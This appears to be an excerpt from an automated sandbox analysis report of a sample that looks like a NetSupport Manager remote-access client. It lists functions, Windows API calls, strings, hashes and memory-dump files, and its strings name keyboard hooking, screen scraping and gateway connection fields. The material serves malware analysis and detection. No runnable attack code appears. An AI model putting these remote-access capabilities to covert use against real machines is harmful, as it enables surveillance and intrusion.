API String ID: 3802068140-2718682828
Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51

Function 6C5E3D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 6C5E3D27

Strings

APPTYPE=%d, xrefs: 6C5E41DD
CMD=OPEN, xrefs: 6C5E3EB9
*Dept, xrefs: 6C5E41F4
*Gsk, xrefs: 6C5E3E24
PORT=%d, xrefs: 6C5E3F68
TCPIP, xrefs: 6C5E3DCF, 6C5E3DDF
CHATID=%s, xrefs: 6C5E4046
DEPT=%s, xrefs: 6C5E420C
ListenPort, xrefs: 6C5E3DDA
A1=%s, xrefs: 6C5E40AF
CLIENT_NAME=%s, xrefs: 6C5E3F17
GSK=%s, xrefs: 6C5E3FCC
506407, xrefs: 6C5E3F0C
PROTOCOL_VER=%u.%u, xrefs: 6C5E3EEB
1.1, xrefs: 6C5E3E02
CHATID, xrefs: 6C5E400A
CMPI=%u, xrefs: 6C5E3FEA
Port, xrefs: 6C5E3DCA
HOSTNAME=%s, xrefs: 6C5E3F9A
client247, xrefs: 6C5E400F, 6C5E406B, 6C5E40D1, 6C5E412B, 6C5E4185
CLIENT_VERSION=1.0, xrefs: 6C5E3ED0
A4=%s, xrefs: 6C5E41BD
A3=%s, xrefs: 6C5E4163
A2=%s, xrefs: 6C5E4109
connection_index == 0, xrefs: 6C5E3D7A
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C5E3D75
MAXPACKET=%d, xrefs: 6C5E3F01
CLIENT_ADDR=%s, xrefs: 6C5E3F4A

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: _memset
String ID: *Dept$*Gsk$1.1$506407$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
API String ID: 2102423945-309379103
Opcode ID: 6d435d229b3b4486908d5cddf25466578f610b9cc7e2ac30755706ff97e1e4e5
Instruction ID: 78ceed8447a9ae39e8a9817248ff21eb9eee86c501455ac377cf3cee1fdc15f7
Opcode Fuzzy Hash: 6d435d229b3b4486908d5cddf25466578f610b9cc7e2ac30755706ff97e1e4e5
Instruction Fuzzy Hash: D0E1A7B2D0021CAACB24DB68DC81FEF7779DF99206F4045D5E50963A41DB30AF888FA5

Function 110A9C90 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(setupapi.dll,F3EE1E80,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
_free.LIBCMT ref: 110A9D60
GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
GetLastError.KERNEL32 ref: 110A9D9D
_malloc.LIBCMT ref: 110A9DB3
GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
SetLastError.KERNEL32(00000078), ref: 110A9E1B
GetLastError.KERNEL32 ref: 110A9E21
_free.LIBCMT ref: 110A9E33
SetLastError.KERNEL32(00000078), ref: 110A9E44
SetLastError.KERNEL32(00000078), ref: 110A9E51
_free.LIBCMT ref: 110A9E64
FreeLibrary.KERNEL32(?,?), ref: 110A9E74
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18

Strings

SetupDiDestroyDeviceInfoList, xrefs: 110A9EC0
setupapi.dll, xrefs: 110A9CBB
SetupDiEnumDeviceInterfaces, xrefs: 110A9D26
SetupDiGetDeviceInterfaceDetailA, xrefs: 110A9D6C, 110A9DCF
SetupDiGetClassDevsA, xrefs: 110A9CDB

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
API String ID: 3464732724-3340099623
Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50

Function 11133920 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278
libraryloadertimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,F3EE1E80), ref: 1113398E
LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
GetCurrentProcess.KERNEL32 ref: 11133A27
GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
SetLastError.KERNEL32(00000078), ref: 11133A68
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
SetLastError.KERNEL32(00000078), ref: 11133AC9
SetLastError.KERNEL32(00000078), ref: 11133AD6
GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
SetLastError.KERNEL32(00000078), ref: 11133B01
FreeLibrary.KERNEL32(?), ref: 11133C6B
FreeLibrary.KERNEL32(?), ref: 11133C78
FreeLibrary.KERNEL32(?), ref: 11133C82

Strings

psapi.dll, xrefs: 111339C3
GetGuiResources, xrefs: 11133A7E, 11133AA6
GetProcessHandleCount, xrefs: 11133A4B
GetProcessMemoryInfo, xrefs: 11133AE2
RestartUserObj, xrefs: 11133C35
_debug, xrefs: 11133972
CheckLeaks, xrefs: 1113396D
RestartHandles, xrefs: 11133BE7
Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB, xrefs: 11133B73
Date=%04d-%02d-%02d, xrefs: 111339AB
RestartMB, xrefs: 11133BBC
RestartGdiObj, xrefs: 11133C0E
Client, xrefs: 11133BC1, 11133BEC, 11133C13, 11133C3A

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
API String ID: 263027137-1001504656
Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

Function 1102DBC9 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31

Strings

, xrefs: 1102E0B5
506407, xrefs: 1102E145, 1102E36C, 1102E3E1
14/03/16 10:38:31 V12.10F8, xrefs: 1102E3BE
TSMode, xrefs: 1102DEE0
Error x%x reading %s, sesh=%d, xrefs: 1102DDB1
WTSFreeMemory, xrefs: 1102E061
ListenPort, xrefs: 1102DF00
screenscrape, xrefs: 1102DF18
WTSQuerySessionInformationA, xrefs: 1102DF9E
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102E3EA
client32 dbi %hs, xrefs: 1102E3C3
ts macaddr=%s, xrefs: 1102E01C
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102E410
DisableConsoleClient, xrefs: 1102DE67
client32.ini, xrefs: 1102DD55
MacAddress, xrefs: 1102E02F
TCPIP, xrefs: 1102DF05
ClientName, xrefs: 1102E0E5
Wtsapi32.dll, xrefs: 1102DF2C
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DFF4
Client, xrefs: 1102DEE5, 1102DF1D, 1102E034

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $14/03/16 10:38:31 V12.10F8$506407$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1029625771-3351986879
Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51

Function 111414A0 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266
libraryregistryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
FreeLibrary.KERNEL32(00000000), ref: 11141563
LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
_memset.LIBCMT ref: 111415F9
LoadCursorA.USER32(00000000,00007F00), ref: 11141649
GetStockObject.GDI32(00000000), ref: 11141653
RegisterClassExA.USER32(?), ref: 1114166A
LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
#17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873

Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,F3EE1E80,1102FCB2,00000000), ref: 1101747E
Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8

Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840

Strings

riched32.dll, xrefs: 1114186E
HookKeyboard, xrefs: 11141711
pcihooks, xrefs: 111416FD
_License, xrefs: 111415B2
InitUI (%d), xrefs: 111414CC
_debug, xrefs: 11141771
TraceCopyData, xrefs: 1114176C
UI.CPP, xrefs: 11141621, 1114167C
View, xrefs: 11141751
NSMWClass, xrefs: 111415D7, 11141663
imm32, xrefs: 1114157C
User32.dll, xrefs: 111414E7
NSMGetAppIcon(), xrefs: 11141626
*quiet, xrefs: 111415AD

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
API String ID: 3706574701-3145203681
Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

Function 6C5D63C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(6C61B898,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D63E8
InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6C5D63FA
EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6412
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D643B
SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6450
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D646F
SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6484
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D64A3
SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64C5
shutdown.WSOCK32(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64E9
GetLastError.KERNEL32(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64F2
timeGetTime.WINMM(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6510
#16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6526
GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6533
timeGetTime.WINMM(?,00000000,?,6C5DD77B,00000000), ref: 6C5D6540
Sleep.KERNEL32(00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D654B
#16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6563
closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6574
WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D657D
Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D658E
GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D659E
_memset.LIBCMT ref: 6C5D65C8
LeaveCriticalSection.KERNEL32(?,?,6C5DD77B,00000000), ref: 6C5D65D7
LeaveCriticalSection.KERNEL32(6C61B898,?,00000000,?,6C5DD77B,00000000), ref: 6C5D65F2

Strings

CloseGatewayConnection - closesocket(%u) FAILED (%d), xrefs: 6C5D65A9
InternetCloseHandle, xrefs: 6C5D6435, 6C5D6469, 6C5D649D
CloseGatewayConnection - shutdown(%u) FAILED (%d), xrefs: 6C5D64FD

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
API String ID: 3764039262-2631155478
Opcode ID: f3d403a941c4984374258638dd86798888d02ad622736958829eb0afce58e01c
Instruction ID: d350ec50ab228f9414e152a4c03de73e372ac209e7368118c740cc8463c9be9d
Opcode Fuzzy Hash: f3d403a941c4984374258638dd86798888d02ad622736958829eb0afce58e01c
Instruction Fuzzy Hash: 8F51BF71644300EFDB10EF6DCCC5B5A73B8AB89316F120915E906D7A81DB70E986CF69

Function 6C5D98D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strncmp.LIBCMT ref: 6C5D996F
_strncmp.LIBCMT ref: 6C5D99A5

Strings

SendHttpReq failed, not connected to gateway!, xrefs: 6C5D9934, 6C5D9B79
Error send returned 0 on connection %d, xrefs: 6C5D9CF8
abort send, gateway hungup, xrefs: 6C5D9D2E
3', xrefs: 6C5D9CB2
NC_DATA, xrefs: 6C5D9969
xx %02x, xrefs: 6C5D9AFB
CMD=NC_DATA, xrefs: 6C5D999F
%s, xrefs: 6C5D9AAA
Error %d writing inet request on connection %d, xrefs: 6C5D9BE3
%02x %02x, xrefs: 6C5D9AE7
Error %d sending HTTP request on connection %d, xrefs: 6C5D9D1F

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
API String ID: 909875538-2848211065
Opcode ID: fb52e782a14474a73dab20392db70733aa14038a2242b7f7af2842cf1d96cfa5
Instruction ID: dba97fcb907ed3845e0f623ca9bd7ef6d1fef07121cf68773d2a8783451612ab
Opcode Fuzzy Hash: fb52e782a14474a73dab20392db70733aa14038a2242b7f7af2842cf1d96cfa5
Instruction Fuzzy Hash: B7D12271A053199FDB20CF6CCCA1BD9B774AF4A308F0641D9D8099BA41DB31AD89CF89

Function 110285F0 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,6E621370,?,0000001A), ref: 110286DD
_strrchr.LIBCMT ref: 110286EC

Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B

Strings

TechConsole, xrefs: 11028B1D
SupportEMail, xrefs: 110289C5
product.dat, xrefs: 110286A0, 110286F1
NSMAppDataDir, xrefs: 110289F5
SupportsAndroid, xrefs: 11028B82
SupportsChrome, xrefs: 11028AE6
NSSConfName, xrefs: 11028A55
Name, xrefs: 1102883E
LongName, xrefs: 11028875
AssistantName, xrefs: 11028A8C
AssistantURL, xrefs: 11028AB9
ShortName, xrefs: 110288A5
Home, xrefs: 110288D5
TLA, xrefs: 11028905
??I, xrefs: 11028CF7
NSSLongCaption, xrefs: 11028B55
NSSName, xrefs: 11028935
??F, xrefs: 11028C70
NSSTLA, xrefs: 11028965
\, xrefs: 1102866C
NSSAppDataDir, xrefs: 11028A25
SupportWWW, xrefs: 11028995

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
